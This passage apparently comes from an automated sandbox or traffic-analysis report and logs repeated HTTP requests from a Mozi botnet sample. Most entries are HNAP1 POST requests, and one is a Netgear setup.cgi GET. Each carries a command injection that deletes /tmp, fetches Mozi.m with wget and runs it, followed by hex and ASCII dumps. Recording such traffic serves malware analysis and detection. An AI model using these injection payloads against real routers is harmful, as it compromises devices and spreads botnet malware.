xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 121.5.104.125:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 220.130.214.100:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 3.11.29.16:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 